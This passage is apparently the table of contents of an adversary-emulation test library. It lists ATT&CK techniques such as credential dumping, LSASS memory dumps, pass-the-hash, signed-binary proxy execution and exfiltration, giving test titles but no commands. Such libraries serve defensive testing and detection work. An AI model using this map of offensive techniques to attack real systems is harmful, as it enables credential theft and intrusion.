- Atomic Test #1: Permission Groups Discovery [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell [windows]
- Atomic Test #4: Elevated group enumeration using net group [windows]
- T1057 Process Discovery
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- T1012 Query Registry
- Atomic Test #1: Query Registry [windows]
- T1018 Remote System Discovery
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- T1063 Security Software Discovery
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows]
- T1518 Software Discovery
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- T1082 System Information Discovery
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- T1016 System Network Configuration Discovery
- Atomic Test #1: System Network Configuration Discovery [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (Trickbot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- T1049 System Network Connections Discovery
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1033 System Owner/User Discovery
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1007 System Service Discovery
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- T1124 System Time Discovery
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497 Virtualization/Sandbox Evasion CONTRIBUTE A TEST
- T1098 Account Manipulation
- Atomic Test #1: Admin Account Manipulate [windows]
- T1139 Bash History
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force
- Atomic Test #1: Brute Force Credentials [windows]
- T1522 Cloud Instance Metadata API CONTRIBUTE A TEST
- T1003 Credential Dumping
- Atomic Test #1: Powershell Mimikatz [windows]
- Atomic Test #2: Gsecdump [windows]
- Atomic Test #3: Windows Credential Editor [windows]
- Atomic Test #4: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #11: GPP Passwords (findstr) [windows]
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- Atomic Test #13: LSASS read with pypykatz [windows]
- Atomic Test #14: Registry parse with pypykatz [windows]
- T1503 Credentials from Web Browsers CONTRIBUTE A TEST
- T1081 Credentials in Files
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- T1214 Credentials in Registry
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access CONTRIBUTE A TEST
- T1187 Forced Authentication CONTRIBUTE A TEST
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1056 Input Capture
- Atomic Test #1: Input Capture [windows]
- T1141 Input Prompt
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1208 Kerberoasting
- Atomic Test #1: Request for service tickets [windows]
- T1142 Keychain
- Atomic Test #1: Keychain [macos]
- T1171 LLMNR/NBT-NS Poisoning and Relay CONTRIBUTE A TEST
- T1040 Network Sniffing
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture MacOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
- T1174 Password Filter DLL
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1145 Private Keys
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1167 Securityd Memory CONTRIBUTE A TEST
- T1528 Steal Application Access Token CONTRIBUTE A TEST
- T1539 Steal Web Session Cookie CONTRIBUTE A TEST
- T1111 Two-Factor Authentication Interception CONTRIBUTE A TEST
- T1155 AppleScript
- Atomic Test #1: AppleScript [macos]
- T1191 CMSTP
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1059 Command-Line Interface
- Atomic Test #1: Command-Line Interface [macos, linux]
- T1223 Compiled HTML File
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1175 Component Object Model and Distributed COM CONTRIBUTE A TEST
- T1196 Control Panel Items
- Atomic Test #1: Control Panel Items [windows]
- T1173 Dynamic Data Exchange
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- T1106 Execution through API CONTRIBUTE A TEST
- T1129 Execution through Module Load CONTRIBUTE A TEST
- T1203 Exploitation for Client Execution CONTRIBUTE A TEST
- T1061 Graphical User Interface CONTRIBUTE A TEST
- T1118 InstallUtil
- Atomic Test #1: InstallUtil uninstall method call [windows]
- Atomic Test #2: InstallUtil GetHelp method call [windows]
- T1177 LSASS Driver CONTRIBUTE A TEST
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1168 Local Job Scheduling
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, linux]
- T1170 Mshta
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- T1086 PowerShell
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: BloodHound [windows]
- Atomic Test #3: Obfuscation Tests [windows]
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- Atomic Test #13: PowerShell Downgrade Attack [windows]
- Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- T1121 Regsvcs/Regasm
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
- T1117 Regsvr32
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- T1085 Rundll32
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1064 Scripting
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Create and Execute Batch Script [windows]
- T1035 Service Execution
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1218 Signed Binary Proxy Execution
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
- Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- T1216 Signed Script Proxy Execution
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1153 Source
- Atomic Test #1: Execute Script using Source [macos, linux]
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
- T1151 Space after Filename
- Atomic Test #1: Space After Filename [macos]
- T1072 Third-party Software CONTRIBUTE A TEST
- T1154 Trap
- Atomic Test #1: Trap [macos, linux]
- T1127 Trusted Developer Utilities
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1204 User Execution CONTRIBUTE A TEST
- T1047 Windows Management Instrumentation
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- T1028 Windows Remote Management
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]
- Atomic Test #5: Invoke-Command [windows]
- T1220 XSL Script Processing
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- T1155 AppleScript
- Atomic Test #1: AppleScript [macos]
- T1527 Application Access Token CONTRIBUTE A TEST
- T1017 Application Deployment Software CONTRIBUTE A TEST
- T1175 Component Object Model and Distributed COM CONTRIBUTE A TEST
- T1210 Exploitation of Remote Services CONTRIBUTE A TEST
- T1534 Internal Spearphishing CONTRIBUTE A TEST
- T1037 Logon Scripts
- Atomic Test #1: Logon Scripts [windows]
- Atomic Test #2: Startup Folder Script [windows]
- Atomic Test #3: Scheduled Task Startup Script [windows]
- Atomic Test #4: Logon Scripts - Mac [macos]
- T1075 Pass the Hash
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- T1097 Pass the Ticket
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- T1076 Remote Desktop Protocol
- Atomic Test #1: RDP [windows]
- Atomic Test #2: RDPto-DomainController [windows]
- T1105 Remote File Copy
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- T1021 Remote Services CONTRIBUTE A TEST
- T1091 Replication Through Removable Media CONTRIBUTE A TEST
- T1184 SSH Hijacking CONTRIBUTE A TEST
- T1051 Shared Webroot CONTRIBUTE A TEST
- T1080 Taint Shared Content CONTRIBUTE A TEST
- T1072 Third-party Software CONTRIBUTE A TEST
- T1506 Web Session Cookie CONTRIBUTE A TEST
- T1077 Windows Admin Shares
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1028 Windows Remote Management
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]
- Atomic Test #5: Invoke-Command [windows]
- T1123 Audio Capture
- Atomic Test #1: using device audio capture commandlet [windows]
- T1119 Automated Collection
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- T1115 Clipboard Data
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: PowerShell [windows]
- T1074 Data Staged
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- T1530 Data from Cloud Storage Object CONTRIBUTE A TEST
- T1213 Data from Information Repositories CONTRIBUTE A TEST
- T1005 Data from Local System
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive CONTRIBUTE A TEST
- T1025 Data from Removable Media CONTRIBUTE A TEST
- T1114 Email Collection
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- T1056 Input Capture
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser CONTRIBUTE A TEST
- T1113 Screen Capture
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Import [linux]
- T1125 Video Capture CONTRIBUTE A TEST
- T1020 Automated Exfiltration CONTRIBUTE A TEST
- T1002 Data Compressed
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- Atomic Test #2: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #3: Data Compressed - nix - zip [linux, macos]
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- T1022 Data Encrypted
- Atomic Test #1: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- T1030 Data Transfer Size Limits
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1048 Exfiltration Over Alternative Protocol
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
- T1041 Exfiltration Over Command and Control Channel CONTRIBUTE A TEST
- T1011 Exfiltration Over Other Network Medium CONTRIBUTE A TEST
- T1052 Exfiltration Over Physical Medium CONTRIBUTE A TEST
- T1029 Scheduled Transfer CONTRIBUTE A TEST
- T1537 Transfer Data to Cloud Account CONTRIBUTE A TEST
- T1043 Commonly Used Port CONTRIBUTE A TEST
- T1092 Communication Through Removable Media CONTRIBUTE A TEST
- T1090 Connection Proxy
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol CONTRIBUTE A TEST
- T1024 Custom Cryptographic Protocol CONTRIBUTE A TEST
- T1132 Data Encoding
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001 Data Obfuscation CONTRIBUTE A TEST
- T1172 Domain Fronting CONTRIBUTE A TEST
- T1483 Domain Generation Algorithms CONTRIBUTE A TEST
- T1008 Fallback Channels CONTRIBUTE A TEST
- T1104 Multi-Stage Channels CONTRIBUTE A TEST
- T1188 Multi-hop Proxy CONTRIBUTE A TEST
- T1026 Multiband Communication CONTRIBUTE A TEST
- T1079 Multilayer Encryption CONTRIBUTE A TEST
- T1205 Port Knocking CONTRIBUTE A TEST
- T1219 Remote Access Tools CONTRIBUTE A TEST
- T1105 Remote File Copy
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- T1071 Standard Application Layer Protocol
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol
- Atomic Test #1: OpenSSL C2 [windows]
- T1095 Standard Non-Application Layer Protocol CONTRIBUTE A TEST
- T1065 Uncommonly Used Port
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102 Web Service
- Atomic Test #1: Reach out to C2 Pointer URLs via command_prompt [windows]
- Atomic Test #2: Reach out to C2 Pointer URLs via powershell [windows]
- T1189 Drive-by Compromise CONTRIBUTE A TEST
- T1190 Exploit Public-Facing Application CONTRIBUTE A TEST
- T1133 External Remote Services CONTRIBUTE A TEST
- T1200 Hardware Additions CONTRIBUTE A TEST
- T1091 Replication Through Removable Media CONTRIBUTE A TEST
- T1193 Spearphishing Attachment
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1192 Spearphishing Link CONTRIBUTE A TEST
- T1194 Spearphishing via Service CONTRIBUTE A TEST
- T1195 Supply Chain Compromise CONTRIBUTE A TEST
- T1199 Trusted Relationship CONTRIBUTE A TEST
- T1078 Valid Accounts CONTRIBUTE A TEST